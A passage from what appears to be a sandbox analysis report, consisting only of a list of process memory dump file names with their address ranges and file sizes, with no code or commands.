                                        • memory/1604-343-0x0000000000400000-0x0000000000840000-memory.dmp

                                          Filesize

                                          4.2MB

                                        • memory/1604-82-0x0000000000400000-0x0000000000840000-memory.dmp

                                          Filesize

                                          4.2MB

                                        • memory/1604-137-0x0000000000400000-0x0000000000840000-memory.dmp

                                          Filesize

                                          4.2MB

                                        • memory/1684-287-0x0000000000400000-0x0000000000840000-memory.dmp

                                          Filesize

                                          4.2MB

                                        • memory/1684-138-0x0000000000400000-0x0000000000840000-memory.dmp

                                          Filesize

                                          4.2MB

                                        • memory/1684-448-0x0000000000400000-0x0000000000840000-memory.dmp

                                          Filesize

                                          4.2MB

                                        • memory/1684-541-0x0000000000400000-0x0000000000840000-memory.dmp

                                          Filesize

                                          4.2MB

                                        • memory/1684-204-0x0000000000400000-0x0000000000840000-memory.dmp

                                          Filesize

                                          4.2MB

                                        • memory/1684-112-0x0000000000400000-0x0000000000840000-memory.dmp

                                          Filesize

                                          4.2MB

                                        • memory/1684-499-0x0000000000400000-0x0000000000840000-memory.dmp

                                          Filesize

                                          4.2MB

                                        • memory/1684-560-0x0000000000400000-0x0000000000840000-memory.dmp

                                          Filesize

                                          4.2MB

                                        • memory/1748-367-0x0000000000400000-0x0000000000466000-memory.dmp

                                          Filesize

                                          408KB

                                        • memory/1748-373-0x0000000000400000-0x0000000000466000-memory.dmp

                                          Filesize

                                          408KB

                                        • memory/1748-371-0x0000000000400000-0x0000000000466000-memory.dmp

                                          Filesize

                                          408KB

                                        • memory/1748-375-0x0000000000400000-0x0000000000466000-memory.dmp

                                          Filesize

                                          408KB

                                        • memory/1748-377-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/1748-380-0x0000000000400000-0x0000000000466000-memory.dmp

                                          Filesize

                                          408KB

                                        • memory/1748-378-0x0000000000400000-0x0000000000466000-memory.dmp

                                          Filesize

                                          408KB

                                        • memory/1748-369-0x0000000000400000-0x0000000000466000-memory.dmp

                                          Filesize

                                          408KB

                                        • memory/1796-558-0x0000000001030000-0x0000000001339000-memory.dmp

                                          Filesize

                                          3.0MB

                                        • memory/1796-540-0x0000000001030000-0x0000000001339000-memory.dmp

                                          Filesize

                                          3.0MB

                                        • memory/1796-562-0x0000000001030000-0x0000000001339000-memory.dmp

                                          Filesize

                                          3.0MB

                                        • memory/2172-341-0x0000000000270000-0x0000000000282000-memory.dmp

                                          Filesize

                                          72KB

                                        • memory/2172-342-0x00000000001C0000-0x00000000001D0000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/2232-106-0x0000000000360000-0x0000000000A4E000-memory.dmp

                                          Filesize

                                          6.9MB

                                        • memory/2232-943-0x0000000000360000-0x0000000000A4E000-memory.dmp

                                          Filesize

                                          6.9MB

                                        • memory/2232-133-0x0000000000360000-0x0000000000A4E000-memory.dmp

                                          Filesize

                                          6.9MB

                                        • memory/2244-469-0x0000000000EF0000-0x000000000138B000-memory.dmp

                                          Filesize

                                          4.6MB

                                        • memory/2244-501-0x0000000000EF0000-0x000000000138B000-memory.dmp

                                          Filesize

                                          4.6MB

                                        • memory/2356-36-0x0000000000DB0000-0x0000000000DC0000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/2408-587-0x0000000000400000-0x0000000000465000-memory.dmp

                                          Filesize

                                          404KB

                                        • memory/2480-491-0x000000001B560000-0x000000001B842000-memory.dmp

                                          Filesize

                                          2.9MB

                                        • memory/2480-492-0x0000000001F70000-0x0000000001F78000-memory.dmp

                                          Filesize

                                          32KB

                                        • memory/2640-346-0x000000013FA90000-0x00000001410DB000-memory.dmp

                                          Filesize

                                          22.3MB

                                        • memory/2752-314-0x0000000000400000-0x0000000000429000-memory.dmp

                                          Filesize

                                          164KB

                                        • memory/2752-306-0x0000000000400000-0x0000000000429000-memory.dmp

                                          Filesize

                                          164KB

                                        • memory/2752-323-0x0000000000400000-0x0000000000429000-memory.dmp

                                          Filesize

                                          164KB

                                        • memory/2752-322-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/2752-320-0x0000000000400000-0x0000000000429000-memory.dmp

                                          Filesize

                                          164KB

                                        • memory/2752-325-0x0000000000400000-0x0000000000429000-memory.dmp

                                          Filesize

                                          164KB

                                        • memory/2752-318-0x0000000000400000-0x0000000000429000-memory.dmp

                                          Filesize

                                          164KB

                                        • memory/2752-308-0x0000000000400000-0x0000000000429000-memory.dmp

                                          Filesize

                                          164KB

                                        • memory/2752-316-0x0000000000400000-0x0000000000429000-memory.dmp

                                          Filesize

                                          164KB

                                        • memory/2752-310-0x0000000000400000-0x0000000000429000-memory.dmp

                                          Filesize

                                          164KB

                                        • memory/2752-312-0x0000000000400000-0x0000000000429000-memory.dmp

                                          Filesize

                                          164KB

                                        • memory/2780-86-0x0000000000FB0000-0x0000000001460000-memory.dmp

                                          Filesize

                                          4.7MB

                                        • memory/2780-660-0x0000000006920000-0x000000000732D000-memory.dmp

                                          Filesize

                                          10.1MB

                                        • memory/2780-515-0x0000000006920000-0x0000000006DBB000-memory.dmp

                                          Filesize

                                          4.6MB

                                        • memory/2780-18-0x0000000000FB0000-0x0000000001460000-memory.dmp

                                          Filesize

                                          4.7MB

                                        • memory/2780-19-0x0000000000FB1000-0x0000000000FDF000-memory.dmp

                                          Filesize

                                          184KB

                                        • memory/2780-20-0x0000000000FB0000-0x0000000001460000-memory.dmp

                                          Filesize

                                          4.7MB

                                        • memory/2780-525-0x0000000000FB0000-0x0000000001460000-memory.dmp

                                          Filesize

                                          4.7MB

                                        • memory/2780-22-0x0000000000FB0000-0x0000000001460000-memory.dmp

                                          Filesize

                                          4.7MB

                                        • memory/2780-538-0x0000000006300000-0x0000000006609000-memory.dmp

                                          Filesize

                                          3.0MB

                                        • memory/2780-539-0x0000000006300000-0x0000000006609000-memory.dmp

                                          Filesize

                                          3.0MB

                                        • memory/2780-345-0x0000000000FB0000-0x0000000001460000-memory.dmp

                                          Filesize

                                          4.7MB

                                        • memory/2780-23-0x0000000000FB0000-0x0000000001460000-memory.dmp

                                          Filesize

                                          4.7MB

                                        • memory/2780-473-0x0000000000FB0000-0x0000000001460000-memory.dmp

                                          Filesize

                                          4.7MB

                                        • memory/2780-549-0x0000000006300000-0x0000000006609000-memory.dmp

                                          Filesize

                                          3.0MB

                                        • memory/2780-555-0x0000000006920000-0x000000000732D000-memory.dmp

                                          Filesize

                                          10.1MB

                                        • memory/2780-557-0x0000000006300000-0x0000000006609000-memory.dmp

                                          Filesize

                                          3.0MB

                                        • memory/2780-556-0x0000000000FB0000-0x0000000001460000-memory.dmp

                                          Filesize

                                          4.7MB

                                        • memory/2780-468-0x0000000006920000-0x0000000006DBB000-memory.dmp

                                          Filesize

                                          4.6MB

                                        • memory/2780-284-0x0000000000FB0000-0x0000000001460000-memory.dmp

                                          Filesize

                                          4.7MB

                                        • memory/2780-37-0x0000000000FB0000-0x0000000001460000-memory.dmp

                                          Filesize

                                          4.7MB

                                        • memory/2780-191-0x0000000006920000-0x0000000006DC1000-memory.dmp

                                          Filesize

                                          4.6MB

                                        • memory/2780-136-0x0000000000FB0000-0x0000000001460000-memory.dmp

                                          Filesize

                                          4.7MB

                                        • memory/2780-467-0x0000000006920000-0x0000000006DBB000-memory.dmp

                                          Filesize

                                          4.6MB

                                        • memory/2780-514-0x0000000006920000-0x0000000006DBB000-memory.dmp

                                          Filesize

                                          4.6MB

                                        • memory/2780-131-0x0000000006920000-0x000000000700E000-memory.dmp

                                          Filesize

                                          6.9MB

                                        • memory/2780-130-0x0000000006920000-0x0000000006DC1000-memory.dmp

                                          Filesize

                                          4.6MB

                                        • memory/2780-128-0x0000000006920000-0x0000000006DC1000-memory.dmp

                                          Filesize

                                          4.6MB

                                        • memory/2780-127-0x0000000006920000-0x000000000700E000-memory.dmp

                                          Filesize

                                          6.9MB

                                        • memory/2780-108-0x0000000000FB0000-0x0000000001460000-memory.dmp

                                          Filesize

                                          4.7MB

                                        • memory/2780-104-0x0000000006920000-0x000000000700E000-memory.dmp

                                          Filesize

                                          6.9MB

                                        • memory/2780-105-0x0000000006920000-0x000000000700E000-memory.dmp

                                          Filesize

                                          6.9MB

                                        • memory/2804-132-0x00000000002F0000-0x0000000000791000-memory.dmp

                                          Filesize

                                          4.6MB

                                        • memory/2804-206-0x00000000002F0000-0x0000000000791000-memory.dmp

                                          Filesize

                                          4.6MB

                                        • memory/2948-2-0x0000000000A81000-0x0000000000AAF000-memory.dmp

                                          Filesize

                                          184KB

                                        • memory/2948-5-0x0000000000A80000-0x0000000000F30000-memory.dmp

                                          Filesize

                                          4.7MB

                                        • memory/2948-1-0x0000000077C70000-0x0000000077C72000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/2948-0-0x0000000000A80000-0x0000000000F30000-memory.dmp

                                          Filesize

                                          4.7MB

                                        • memory/2948-15-0x0000000000A80000-0x0000000000F30000-memory.dmp

                                          Filesize

                                          4.7MB

                                        • memory/2948-3-0x0000000000A80000-0x0000000000F30000-memory.dmp

                                          Filesize

                                          4.7MB

                                        • memory/2948-16-0x0000000007020000-0x00000000074D0000-memory.dmp

                                          Filesize

                                          4.7MB

                                        • memory/2948-4-0x0000000000A80000-0x0000000000F30000-memory.dmp

                                          Filesize

                                          4.7MB

                                        • memory/2976-522-0x0000000001D10000-0x0000000001D18000-memory.dmp

                                          Filesize

                                          32KB

                                        • memory/2976-521-0x000000001B7A0000-0x000000001BA82000-memory.dmp

                                          Filesize

                                          2.9MB

                                        • memory/3008-497-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

                                          Filesize

                                          2.9MB

                                        • memory/3008-498-0x0000000002810000-0x0000000002818000-memory.dmp

                                          Filesize

                                          32KB

                                        • memory/4084-1424-0x0000000000310000-0x0000000000782000-memory.dmp

                                          Filesize

                                          4.4MB

                                        • memory/4084-1425-0x0000000000310000-0x0000000000782000-memory.dmp

                                          Filesize

                                          4.4MB